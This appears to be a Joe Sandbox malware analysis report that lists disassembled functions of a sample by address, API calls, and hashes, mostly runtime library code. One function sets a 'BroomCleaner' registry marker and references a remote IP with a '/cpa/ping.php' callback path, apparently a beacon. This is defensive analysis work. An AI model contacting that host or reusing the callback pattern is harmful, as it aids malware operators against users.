API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 8da020f59b73da55e944a716f6406de2f80b35aa4703f2a4fd96452cb970ac71
Instruction ID: 4f39e38af747b98161d8baf37328b82bff2b26a94177c16a607e7197b56696fc
Opcode Fuzzy Hash: 8da020f59b73da55e944a716f6406de2f80b35aa4703f2a4fd96452cb970ac71
Instruction Fuzzy Hash: C0B11875A016199FDF24DF18C888AAEB7B5FB48304F5045EADA49A7250D731BE94CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00414A4A Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

_memcmp.LIBVCRUNTIME ref: 00414CF4
_free.LIBCMT ref: 00414D65
_free.LIBCMT ref: 00414D7E
_free.LIBCMT ref: 00414DB0
_free.LIBCMT ref: 00414DB9
_free.LIBCMT ref: 00414DC5

Strings

C, xrefs: 00414BB2

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: e89ccd2a3967dbde377b9359045f7db90b46cd3f4383fc33eaa8f2e05e3481b2
Instruction ID: f1eb2fe4340e97ed79650f57c8a8747809c023f352878a21904a4d61aa040acb
Opcode Fuzzy Hash: e89ccd2a3967dbde377b9359045f7db90b46cd3f4383fc33eaa8f2e05e3481b2
Instruction Fuzzy Hash: B7B12975A012199BDB24DF18D884BEEB7B4FF88304F5045AAE849A7350E735AED1CF48

Uniqueness

Uniqueness Score: -1.00%

Function 004145CC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77

_free.LIBCMT ref: 004146D7
_free.LIBCMT ref: 004146EE
_free.LIBCMT ref: 0041470D
_free.LIBCMT ref: 00414728
_free.LIBCMT ref: 0041473F

Strings

|B, xrefs: 004146B1
B, xrefs: 0041461F

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: _free$AllocateHeap
String ID: B$|B
API String ID: 3033488037-200315465
Opcode ID: 0551716ea73a6ef0ea3937d8a9b0131bc722ba02b4a1552fb15e10019e7b872c
Instruction ID: bceed09af247e51911f2c06e24e965b8c83290834e1de00ea3c3fe4b0a612a45
Opcode Fuzzy Hash: 0551716ea73a6ef0ea3937d8a9b0131bc722ba02b4a1552fb15e10019e7b872c
Instruction Fuzzy Hash: F351E631A00304AFDB20DF66D841BAA77F4EF99728F14056EE849DB690E739DD81CB48

Uniqueness

Uniqueness Score: -1.00%

Function 0041673F Relevance: 12.2, APIs: 8, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0040F850,0040F850,?,?,?,00416990,00000001,00000001,F5E85006), ref: 00416799
__alloca_probe_16.LIBCMT ref: 004167D1
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00416990,00000001,00000001,F5E85006,?,?,?), ref: 0041681F
__alloca_probe_16.LIBCMT ref: 004168B6
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00416919
__freea.LIBCMT ref: 00416926

Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77

__freea.LIBCMT ref: 0041692F
__freea.LIBCMT ref: 00416954

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: 6d456281acf0619f27023182ced17daa6554775fa394724c4215adca619d4e4e
Instruction ID: 945c2db0b5faf58cb0d9801c543b0b3226d139e5166d8e9d93898d86eb794442
Opcode Fuzzy Hash: 6d456281acf0619f27023182ced17daa6554775fa394724c4215adca619d4e4e
Instruction Fuzzy Hash: 2B51E6B2610216ABDB259F65CC41EFF7BA9EF44754F16462EFC04D6280DB38DC90C668

Uniqueness

Uniqueness Score: -1.00%

Function 05BFF03E Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 05BFF0AD
_free.LIBCMT ref: 05BFF0BB
_free.LIBCMT ref: 05BFF1E9
_free.LIBCMT ref: 05BFF1F4

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: b86ba08727650023ed19c92e77eeb825199b3895615cbf632ae48cc155c5a0ec
Instruction ID: 00c8e7f155f6cde2dde7a9cc70da3724feb39947cebb88464e7dda20253dddbe
Opcode Fuzzy Hash: b86ba08727650023ed19c92e77eeb825199b3895615cbf632ae48cc155c5a0ec
Instruction Fuzzy Hash: 1A61A475E44205AFDB20DFA8C841BAEBBF5FF44710F1441EAEA44EB245DB70BA458B50

Uniqueness

Uniqueness Score: -1.00%

Function 0041EDD7 Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0041EE46
_free.LIBCMT ref: 0041EE54
_free.LIBCMT ref: 0041EF82
_free.LIBCMT ref: 0041EF8D

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 5e932ea9069c118bb961e6d76857f0c9b8f4ba2cd0390af678983e5fd13f1dd1
Instruction ID: e986a1f43705154f11102f288933750ce46d6c5c7240a2201f23140d39e68ccb
Opcode Fuzzy Hash: 5e932ea9069c118bb961e6d76857f0c9b8f4ba2cd0390af678983e5fd13f1dd1
Instruction Fuzzy Hash: 6761A076904305AFDB20DF66C842BDABBF4EF48710F1441ABEC44EB281D7749D828B98

Uniqueness

Uniqueness Score: -1.00%

Function 05BF4833 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 05BF7CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05BF7CDE

_free.LIBCMT ref: 05BF493E
_free.LIBCMT ref: 05BF4955
_free.LIBCMT ref: 05BF4974
_free.LIBCMT ref: 05BF498F
_free.LIBCMT ref: 05BF49A6

Strings

B, xrefs: 05BF4886

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID: B
API String ID: 3033488037-2386870291
Opcode ID: e2765243d4b407044065e09a93470513da81931724dfe5683d741b61e3df85b4
Instruction ID: b206c4d4f6cd4e9a7063e93b2e3b3a6413e61265396c484dcf960d46479c5424
Opcode Fuzzy Hash: e2765243d4b407044065e09a93470513da81931724dfe5683d741b61e3df85b4
Instruction Fuzzy Hash: 5651BF32B00205AFDF20DF69D841A6B77F5FF49720B1445A9EA4ADB250E731FA098B80

Uniqueness

Uniqueness Score: -1.00%

Function 05BF5C7A Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,05BF63EF,?,?,?,?,?,?), ref: 05BF5CBC
__fassign.LIBCMT ref: 05BF5D37
__fassign.LIBCMT ref: 05BF5D52
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 05BF5D78
WriteFile.KERNEL32(?,?,00000000,05BF63EF,00000000,?,?,?,?,?,?,?,?,?,05BF63EF,?), ref: 05BF5D97
WriteFile.KERNEL32(?,?,00000001,05BF63EF,00000000,?,?,?,?,?,?,?,?,?,05BF63EF,?), ref: 05BF5DD0

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 4f4f63612dd6758aa9e7fecd2cbe65b3dc713529ec1a556737616ebe55c1ece4
Instruction ID: 6e234998ff1152d8e631d0807e1c498917aa3a31940b3bd2096e2d5efb245d49
Opcode Fuzzy Hash: 4f4f63612dd6758aa9e7fecd2cbe65b3dc713529ec1a556737616ebe55c1ece4
Instruction Fuzzy Hash: C251C870A00249AFDB20CFA8DC85BEEBBF4FF09310F14419AE655E7291D730A955CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00415A13 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,00416188,?,?,?,?,?,?), ref: 00415A55
__fassign.LIBCMT ref: 00415AD0
__fassign.LIBCMT ref: 00415AEB
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 00415B11
WriteFile.KERNEL32(?,?,00000000,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B30
WriteFile.KERNEL32(?,?,00000001,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B69

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 33e6fd75adb2b88f79627ef58a13688fd909e2cfbbaa5c9d8ec04a3e685d9078
Instruction ID: 93abb8da7f4b1ee22325e29d014a78f54aaad6af2ae94e442d530b7aeff6bc03
Opcode Fuzzy Hash: 33e6fd75adb2b88f79627ef58a13688fd909e2cfbbaa5c9d8ec04a3e685d9078
Instruction Fuzzy Hash: 7851E6B0A04609DFDB10CFA8D881BEEBBF4EF49310F14416BE955E7251D774A981CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 0040A6FB
___except_validate_context_record.LIBVCRUNTIME ref: 0040A703
_ValidateLocalCookies.LIBCMT ref: 0040A791
__IsNonwritableInCurrentImage.LIBCMT ref: 0040A7BC
_ValidateLocalCookies.LIBCMT ref: 0040A811

Strings

csm, xrefs: 0040A7A6

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
Instruction ID: 23505c37bb0df54e9d772fc2403dd448dd449399a7c5e18b9979e78af1eb181c
Opcode Fuzzy Hash: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
Instruction Fuzzy Hash: B7415274E003089BCB10DF69C884A9EBBB5AF45318F14C17BE8156B3D2D739D925CB96

Uniqueness

Uniqueness Score: -1.00%

Function 05C063C1 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85registryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 05C063C6
RegCreateKeyExA.ADVAPI32(80000001,SOFTWARE\BroomCleaner,00000000,00000000,00000000,000F003F,00000000,?,00000000,Installed,0043BED8,SOFTWARE\BroomCleaner), ref: 05C063EE
RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,?,0043BED8,0043BED9,Installed,Installed), ref: 05C06471
RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 05C06492

Strings

Installed, xrefs: 05C063D0, 05C063FE, 05C0641D, 05C0641E
SOFTWARE\BroomCleaner, xrefs: 05C063CE, 05C063E1

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: CloseCreateH_prologValue
String ID: Installed$SOFTWARE\BroomCleaner
API String ID: 1996196666-529226407
Opcode ID: 0b1f03838103bc79192dd29aecd11cdb4eee571ac517255c8300f4294fb95730
Instruction ID: 03fff442a9607c96aad75c0489a6880f70804f2f5597babcc575f076399acf80
Opcode Fuzzy Hash: 0b1f03838103bc79192dd29aecd11cdb4eee571ac517255c8300f4294fb95730
Instruction Fuzzy Hash: 74318971A00229EEDF14DFA8CC94AFEBB79FB49214F04056DE80277281C7711E45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004227A8 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81ada43cddaa793191611bc99ca2e9e8f2b927b510fc63ccdaad96e19ac5d437
Instruction ID: e24961ea6169977100e6de332b8cae97d730c3ba4f888c233ff9c32580c66a3b
Opcode Fuzzy Hash: 81ada43cddaa793191611bc99ca2e9e8f2b927b510fc63ccdaad96e19ac5d437
Instruction Fuzzy Hash: 1611E7726081297BDB203F739D059AB3A6CDF92764B51062AFC15D7251DABCC84282B9

Uniqueness

Uniqueness Score: -1.00%

Function 05BFF513 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 05BFF25A: _free.LIBCMT ref: 05BFF283

_free.LIBCMT ref: 05BFF561

Part of subcall function 05BF6501: HeapFree.KERNEL32(00000000,00000000,?,05BFF288,?,00000000,?,00000000,?,05BFF52C,?,00000007,?,?,05BFF920,?), ref: 05BF6517
Part of subcall function 05BF6501: GetLastError.KERNEL32(?,?,05BFF288,?,00000000,?,00000000,?,05BFF52C,?,00000007,?,?,05BFF920,?,?), ref: 05BF6529

_free.LIBCMT ref: 05BFF56C
_free.LIBCMT ref: 05BFF577
_free.LIBCMT ref: 05BFF5CB
_free.LIBCMT ref: 05BFF5D6
_free.LIBCMT ref: 05BFF5E1
_free.LIBCMT ref: 05BFF5EC

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
Instruction ID: 0e6563102dd1b91021e9bd1e52b06f12131770c344c1d118f8c493167d5432c5
Opcode Fuzzy Hash: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
Instruction Fuzzy Hash: 78112472A44708BADB30BBB0CC4EFDF7B9DAF44700F445895BB9966050DA65F5088B51

Uniqueness

Uniqueness Score: -1.00%

Function 0041F2AC Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041EFF3: _free.LIBCMT ref: 0041F01C

_free.LIBCMT ref: 0041F2FA

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2

_free.LIBCMT ref: 0041F305
_free.LIBCMT ref: 0041F310
_free.LIBCMT ref: 0041F364
_free.LIBCMT ref: 0041F36F
_free.LIBCMT ref: 0041F37A
_free.LIBCMT ref: 0041F385

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
Instruction ID: be7813cec9e76b844f682d4c097dbd82c10abeb52ecb146189267b1763b940f2
Opcode Fuzzy Hash: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
Instruction Fuzzy Hash: 1F114272541B24B6D920BB72DC07FCBB7DCBF44708F40081EBE9E66052DA7DB5868654

Uniqueness

Uniqueness Score: -1.00%

Function 05BE43F0 Relevance: 10.6, APIs: 7, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 05BE43F5
std::_Lockit::_Lockit.LIBCPMT ref: 05BE4404
int.LIBCPMT ref: 05BE441B

Part of subcall function 05BE157F: std::_Lockit::_Lockit.LIBCPMT ref: 05BE1590
Part of subcall function 05BE157F: std::_Lockit::~_Lockit.LIBCPMT ref: 05BE15AA

std::locale::_Getfacet.LIBCPMT ref: 05BE4424
std::_Facet_Register.LIBCPMT ref: 05BE4455
std::_Lockit::~_Lockit.LIBCPMT ref: 05BE446B
__CxxThrowException@8.LIBVCRUNTIME ref: 05BE4491

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: e4831a17e9389af87c191ca157e46dd7d187b50277cf216024756019587e60ea
Instruction ID: d7b1a5303f6eaa436113fcd0a11388d6016b0d4d3778766fefbf63e44d0f47f1
Opcode Fuzzy Hash: e4831a17e9389af87c191ca157e46dd7d187b50277cf216024756019587e60ea
Instruction Fuzzy Hash: 92118272E001289BCF15EBA8D809AEE7775EF84614F19459AE815A7290DF74AA01C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 00404189 Relevance: 10.6, APIs: 7, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040418E
std::_Lockit::_Lockit.LIBCPMT ref: 0040419D
int.LIBCPMT ref: 004041B4

Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343

std::locale::_Getfacet.LIBCPMT ref: 004041BD
std::_Facet_Register.LIBCPMT ref: 004041EE
std::_Lockit::~_Lockit.LIBCPMT ref: 00404204
__CxxThrowException@8.LIBVCRUNTIME ref: 0040422A

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: f83ec763f7aa7bb0e71e0afca0b1f6b0fdff92c65dad6a05f866a88dfb1858cd
Instruction ID: eeb1616ca6cccce41a0e0e35b82109652f5c3a79b41a9d78a32d17684d72b000
Opcode Fuzzy Hash: f83ec763f7aa7bb0e71e0afca0b1f6b0fdff92c65dad6a05f866a88dfb1858cd
Instruction Fuzzy Hash: AD119072A041289BCB04EBA5DC06AEE7774EF84358F10456FF915B72D1DB389A04C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 05BE3651 Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 05BE3656
std::_Lockit::_Lockit.LIBCPMT ref: 05BE3665
int.LIBCPMT ref: 05BE367C

Part of subcall function 05BE157F: std::_Lockit::_Lockit.LIBCPMT ref: 05BE1590
Part of subcall function 05BE157F: std::_Lockit::~_Lockit.LIBCPMT ref: 05BE15AA

std::locale::_Getfacet.LIBCPMT ref: 05BE3685
std::_Facet_Register.LIBCPMT ref: 05BE36B6
std::_Lockit::~_Lockit.LIBCPMT ref: 05BE36CC
__CxxThrowException@8.LIBVCRUNTIME ref: 05BE36F2

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: d912247cf65187564cb857c5a435760ff66a759f63cb392730071c1b62a8ae47
Instruction ID: 8298efa32fe340535eb881a147511dc2979dc663ff5f99f211e0bc4281f01ec7
Opcode Fuzzy Hash: d912247cf65187564cb857c5a435760ff66a759f63cb392730071c1b62a8ae47
Instruction Fuzzy Hash: 5311A372E041289FCB05EBA8C808AEE77B5EF45310F28499AE815A7290DB74BA04C7D4

Uniqueness

Uniqueness Score: -1.00%

Function 05BE385C Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 05BE3861
std::_Lockit::_Lockit.LIBCPMT ref: 05BE3870
int.LIBCPMT ref: 05BE3887

Part of subcall function 05BE157F: std::_Lockit::_Lockit.LIBCPMT ref: 05BE1590
Part of subcall function 05BE157F: std::_Lockit::~_Lockit.LIBCPMT ref: 05BE15AA

std::locale::_Getfacet.LIBCPMT ref: 05BE3890
std::_Facet_Register.LIBCPMT ref: 05BE38C1
std::_Lockit::~_Lockit.LIBCPMT ref: 05BE38D7
__CxxThrowException@8.LIBVCRUNTIME ref: 05BE38FD

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: 01699667aa2a77937d9adaa910a4886983fe4db3813f95f217182bdb03a19c45
Instruction ID: 7d4220fe7c5b01fae7cdb7d03793b10c5172d6e8e1e7063e205d76a6aaac0d10
Opcode Fuzzy Hash: 01699667aa2a77937d9adaa910a4886983fe4db3813f95f217182bdb03a19c45
Instruction Fuzzy Hash: 51117772E001249BCB15EBA8C808AFEB7B9EF44710F19459AE915A7290DF74BA04C7D5

Uniqueness

Uniqueness Score: -1.00%

Function 004033EA Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004033EF
std::_Lockit::_Lockit.LIBCPMT ref: 004033FE
int.LIBCPMT ref: 00403415

Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343

std::locale::_Getfacet.LIBCPMT ref: 0040341E
std::_Facet_Register.LIBCPMT ref: 0040344F
std::_Lockit::~_Lockit.LIBCPMT ref: 00403465
__CxxThrowException@8.LIBVCRUNTIME ref: 0040348B

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: 963e99d2a39154fcb044ec2c7a4747b24090c51ae6fc69322cb5dc4ce8462b5c
Instruction ID: cdc69c2a9e90ba919e1258be772e803faed7ee3eebec81448dba6679bc4cf361
Opcode Fuzzy Hash: 963e99d2a39154fcb044ec2c7a4747b24090c51ae6fc69322cb5dc4ce8462b5c
Instruction Fuzzy Hash: 8E11BF329001289BCB05EFA4C815AEE7B78EF84319F10452EE911BB2D1DB789A04CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004035F5 Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004035FA
std::_Lockit::_Lockit.LIBCPMT ref: 00403609
int.LIBCPMT ref: 00403620

Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343

std::locale::_Getfacet.LIBCPMT ref: 00403629
std::_Facet_Register.LIBCPMT ref: 0040365A
std::_Lockit::~_Lockit.LIBCPMT ref: 00403670
__CxxThrowException@8.LIBVCRUNTIME ref: 00403696

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: 0fee8ea1c5c1463a8a6083934962415d071b04a09301998d0775e2a02c1fcd71
Instruction ID: 76a64bb1f13388b8652502aa8a079a3a0bf37f657045f8e793a704159d5c315e
Opcode Fuzzy Hash: 0fee8ea1c5c1463a8a6083934962415d071b04a09301998d0775e2a02c1fcd71
Instruction Fuzzy Hash: FA119032900124ABCB14EF65C805AEE7B74AF48319F10456FE911B73D1DB389A04C799

Uniqueness

Uniqueness Score: -1.00%

Function 05C07D27 Relevance: 9.3, APIs: 6, Instructions: 276COMMON

Download Yara Rule

APIs

_ValidateScopeTableHandlers.LIBCMT ref: 05C07E37
__FindPESection.LIBCMT ref: 05C07E51

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: FindHandlersScopeSectionTableValidate
String ID:
API String ID: 876702719-0
Opcode ID: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
Instruction ID: 5e1dec09d2f739e369a91395632e8262690151188bba6d84ede37f9439a69933
Opcode Fuzzy Hash: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
Instruction Fuzzy Hash: AEA19D72A05615CFCB19CF58C984AAAB7F5FB08310F14AA29D805AB3D1D735EE41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00427AC0 Relevance: 9.3, APIs: 6, Instructions: 276COMMONLIBRARYCODE

Download Yara Rule

APIs

_ValidateScopeTableHandlers.LIBCMT ref: 00427BD0
__FindPESection.LIBCMT ref: 00427BEA

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: FindHandlersScopeSectionTableValidate
String ID:
API String ID: 876702719-0
